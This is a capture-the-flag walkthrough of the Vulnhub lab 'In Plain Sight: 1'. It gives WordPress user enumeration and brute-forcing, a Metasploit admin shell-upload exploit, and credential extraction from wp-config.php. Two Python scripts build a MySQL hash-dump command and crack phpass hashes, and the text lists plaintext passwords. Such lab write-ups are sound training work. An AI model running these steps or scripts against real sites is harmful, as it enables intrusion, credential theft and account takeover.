In today's article we will face an Intermediate challenge: the In Plain Sight: 1 virtual machine, created by "bzyo_" and available on Vulnhub. This is another Capture the Flag challenge where we have to escalate privileges and read the root flag to complete the challenge. Since these labs are available on the Vulnhub website, we will be downloading the lab file from this link.
Penetration Testing Methodology
· Network Scanning
    o netdiscover
    o nmap port scan
· Enumeration
    o FTP Enumeration
    o Browsing HTTP Service
    o Enumerating the WordPress installations
· Exploitation
    o Get a meterpreter session
· Post exploitation
    o Reading passwords from file
    o Login into MySQL to find hashes
    o Using john to crack the hashes
· Privilege escalation
    o Using su command
    o Finding password
    o Checking for SUID
Walkthrough
Network Scanning
The first step is to identify the target. To identify our target we will use the following command:
netdiscover
Now we will use Nmap to gain information about the open ports and the services running on the target machine. For this, type the following command:
nmap -p- 192.168.43.8
From the nmap scan we can see that ports 21, 22 and 80 are open, which means the FTP, SSH and HTTP services are running. First, let's try enumeration with anonymous login on FTP.
After logging in anonymously, we can see that there is a file todo.txt. Download this file using the get command and read it with cat. The content of todo.txt doesn't seem to be useful.
As FTP wasn't useful to us, we can now browse the website to see if we can find some information. For this, open the IP address in our browser.
This is an Apache2 Ubuntu default page, but after exploring it carefully we can see a line hinting at "/var/www/html/index.html". So, let's explore this page.
This page looks like a normal page, but when we click anywhere on it we are led to the following new webpage:
As we can see, this webpage lets you upload an image. We tried uploading an image and it worked, but when we tried to upload a .php file the webpage gave us an error. Upon exploring more, the URL of the webpage caught our attention: it looks like a hash, so we copied it and tried to crack it using john.
It was "goodluck".
At this point we were just being trolled.
We then tried to upload a simple .php file and came across the following error:
But this error leads us to a new page, "upload.php". Let's check the source code of this page.
Yes! There is a comment at the end of the source code, and it is base64-encoded text, so let's decode it using the following command:
echo c28tZGV2LXdvcmRwcmVzcw== | base64 -d
When decoded, the text reads so-dev-wordpress, which looks like a directory or a webpage. But before exploring it, let's check whether there are more pages. For that, use dirbuster.
There are many pages, and the results show that the CMS is WordPress. Therefore we can use wpscan to plough through the two listed directories that mention wordpress. For that, use the following command:
wpscan --url "http://192.168.43.8/wordpress" --enumerate
Similarly, let's enumerate the other directory:
wpscan --url "http://192.168.43.8/so-dev-wordpress" --enumerate
As you can see in the above image there are three users. Now that we have their usernames, we can simply brute-force their passwords. For that, type:
wpscan --url "http://192.168.43.8/wordpress" -U bossperson -P /usr/share/wordlists/dirb/common.txt
Alas, we couldn't find any password, but not to worry: we can run the same command against the other directory, so let's try it by typing:
wpscan --url "http://192.168.43.8/so-dev-wordpress" -U admin,mike -P /usr/share/wordlists/dirb/common.txt
And so we finally found the password for the user admin. Now let's try to upload a shell using msfconsole; through Metasploit we will use the module exploit/unix/webapp/wp_admin_shell_upload.
Once msfconsole is running, type the following set of commands:
use exploit/unix/webapp/wp_admin_shell_upload
set PASSWORD admin1
set RHOSTS 192.168.43.8
set USERNAME admin
set TARGETURI /so-dev-wordpress
exploit
As you can see, we have successfully got our meterpreter session. Let's move on to the shell of the target system: type shell and hit enter, and you are in the shell of the target. The shell we land in has no TTY, so to get a proper interactive session, type the following command:
python3 -c 'import pty;pty.spawn("/bin/sh")'

As we have managed to get a shell, we will now explore the system further to find useful files.
Upon changing directory, we found wp-config.php. As it is a configuration file, there is bound to be useful information in it, so we read its contents using the cat command:
These are MySQL credentials, as the DB_ prefix of the constants (DB_NAME, DB_USER, DB_PASSWORD) indicates. So we can try to log into MySQL with them: first upgrade to a bash shell, then start the mysql client with the DB_USER and DB_PASSWORD values from the file.
bash   # to get a proper shell
We found a database "sodevwp". To switch to it and list its tables, type the following in the mysql client:
show databases;
use sodevwp;
show tables;
Once the above commands have run, you will find the following two hashes in the WordPress users table. The $P$ prefix identifies them as phpass portable hashes, the format WordPress stores in the user_pass column, which john cracks with its phpass format:
$P$BD/ZmfBIhgjHKtkLpPKfhr2t5EDgZA. (for user admin)
$P$B3halPOgh4jqI1tDelkv5TGAHnaOC01 (for user mike)
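To make the post-exploitation steps above repeatable, here is an added example (not part of the original walkthrough or of any tool it uses) that extracts the DB_* constants and $table_prefix from a wp-config.php, builds the query for the users table, and assembles the mysql client invocation. The wp-config.php text in the block is constructed for the example: only the database name sodevwp comes from the page, the user and password are placeholders, and the users table name is derived from $table_prefix (WordPress's default prefix gives wp_users) rather than read from the target.

```python
import re
import shlex
from typing import Dict, List, Tuple

# Constructed sample wp-config.php for this example. DB_NAME matches the
# database seen on the target; DB_USER and DB_PASSWORD are placeholders,
# not the target's real values.
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'sodevwp' );
define( 'DB_USER', 'sodevwp_user' );
define( 'DB_PASSWORD', 'not-the-real-password' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
$table_prefix = 'wp_';
"""

# define( 'DB_X', 'value' ) with single or double quotes and optional spaces.
DEFINE_RE = re.compile(r"""define\(\s*['"](DB_\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")
PREFIX_RE = re.compile(r"""\$table_prefix\s*=\s*['"]([^'"]*)['"]""")


def parse_wp_config(text: str) -> Dict[str, str]:
    """Pull the DB_* constants and $table_prefix out of wp-config.php text.

    $table_prefix falls back to 'wp_' (WordPress's default) when absent.
    Values that themselves contain quote characters are not handled by
    this simple regex and would need a real PHP parser.
    """
    creds = dict(DEFINE_RE.findall(text))
    match = PREFIX_RE.search(text)
    creds["table_prefix"] = match.group(1) if match else "wp_"
    return creds


def users_query(creds: Dict[str, str]) -> str:
    """Query returning the phpass hashes. The table is <prefix>users, so with a
    non-default prefix it is not literally wp_users."""
    return "SELECT user_login, user_pass FROM %susers;" % creds["table_prefix"]


def mysql_command(creds: Dict[str, str], query: str) -> Tuple[List[str], Dict[str, str]]:
    """argv and extra environment for running `query` with the stock mysql client.

    The password goes through MYSQL_PWD instead of -p<password> so it does not
    show up in `ps` output on the compromised host.
    """
    host = creds.get("DB_HOST", "localhost")
    argv = ["mysql", "-h", host, "-u", creds["DB_USER"],
            "-D", creds["DB_NAME"], "-e", query]
    env = {"MYSQL_PWD": creds["DB_PASSWORD"]}
    return argv, env


if __name__ == "__main__":
    creds = parse_wp_config(SAMPLE_WP_CONFIG)
    argv, env = mysql_command(creds, users_query(creds))
    # Prints the command line you would paste into the target's shell.
    print("MYSQL_PWD=%s %s" % (shlex.quote(env["MYSQL_PWD"]), shlex.join(argv)))
```

Paste the printed command into the target shell after `bash`; it runs the users query non-interactively, which is handier than typing `show databases;` and friends by hand when the shell has no TTY.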
As you can see in the image above, cracking the hashes gives us the passwords of the two main users:
admin:admin1
mike:skuxdelux
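To show what john is doing with those $P$ hashes, here is an added example (not part of the original walkthrough or of the author's tooling) that reimplements the phpass portable hash WordPress uses and runs a small dictionary attack with it. The two hash strings are the ones quoted above; the wordlist in the block is constructed for the example.

```python
import hashlib
from typing import Iterable, Optional, Tuple

# Alphabet phpass uses both for the iteration-count character and for the digest.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def parse_setting(setting: str) -> Tuple[int, str]:
    """Split a portable hash into (iteration count, 8-character salt).

    Layout: '$P$' or '$H$', one count character, 8 salt characters, 22 hash
    characters. 'B' is ITOA64 index 13, so WordPress's default is 2**13 rounds.
    """
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    return 1 << count_log2, setting[4:12]


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64 variant (not RFC 4648): 3 bytes -> 4 chars, LSB first."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_hash(password: str, setting: str) -> str:
    """Recompute the portable hash of `password` under the salt and count in `setting`."""
    count, salt = parse_setting(setting)
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(count):  # count iterations of md5(previous_digest || password)
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def crack_phpass(target: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first candidate that reproduces `target`, else None."""
    for candidate in wordlist:
        if phpass_hash(candidate, target) == target:
            return candidate
    return None


if __name__ == "__main__":
    # Hashes quoted in the walkthrough; the wordlist is constructed for this example.
    targets = {
        "admin": "$P$BD/ZmfBIhgjHKtkLpPKfhr2t5EDgZA.",
        "mike": "$P$B3halPOgh4jqI1tDelkv5TGAHnaOC01",
    }
    wordlist = ["password", "admin", "wordpress", "admin1", "skuxdelux"]
    for user, hashed in targets.items():
        print(user, crack_phpass(hashed, wordlist))
```

Because each guess costs 8193 MD5 calls, a Python loop is only fit for tiny wordlists; john's phpass format does the same computation in optimised C, which is why the walkthrough reaches for it.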
Now, try to switch user to mike. As you can observe in the image below, this succeeds, which confirms that the cracked passwords are correct.
Let's move on to privilege escalation. When you change directory to /home, you find another user, "joe".
From /etc/passwd we found out that the password of 'joe' is SmashMouthNoThanks. So now, let's switch user to joe with that password.
To move forward, the only thing left is to get the last flag of the target. To find a way to it we check for SUID binaries with find. Change directory to "/" first, then run:
find . -perm /4000 2>/dev/null
Among the results we find the following useful binaries.
Read the flag using the cat command, as shown in the image below:
VOILA!! We have completed the challenge.